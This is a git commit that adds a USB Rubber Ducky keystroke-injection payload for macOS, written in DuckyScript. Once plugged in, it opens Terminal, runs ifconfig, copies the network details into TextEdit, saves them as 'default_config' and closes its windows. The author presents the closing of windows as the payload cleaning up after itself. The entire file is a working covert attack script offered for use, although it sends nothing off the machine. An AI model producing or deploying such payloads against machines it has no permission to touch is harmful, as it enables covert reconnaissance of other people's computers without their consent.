Created Payload - OSX Internet Protocol Slurp (textile)

This commit is contained in:
Cammar 2015-03-22 21:29:18 -06:00
parent 7e949e9f64
commit a0cfd85d53
1 changed files with 34 additions and 0 deletions

View File

@ -0,0 +1,34 @@
REM Title: OSX Internet Protocol Slurp
REM Author: Cameron Glass
REM Description: This payload quickly copies down information gathered from terminal’s command “ifconfig” and pastes it in a notepad. This payload also quickly cleans up after itself so that you can open the notepad later and look at the information. You can also edit this payload to write it down in a text file.
REM -———————————————-
DELAY 1000
GUI SPACE
DELAY 100
STRING terminal
DELAY 100
ENTER
DELAY 1000
STRING ifconfig
ENTER
DELAY 250
GUI A
DELAY 100
GUI C
DELAY 100
GUI Q
DELAY 100
GUI SPACE
DELAY 100
STRING textedit
DELAY 100
ENTER
DELAY 1000
GUI A
DELAY 100
GUI V
DELAY 100
GUI Q
DELAY 500
STRING default_config
ENTER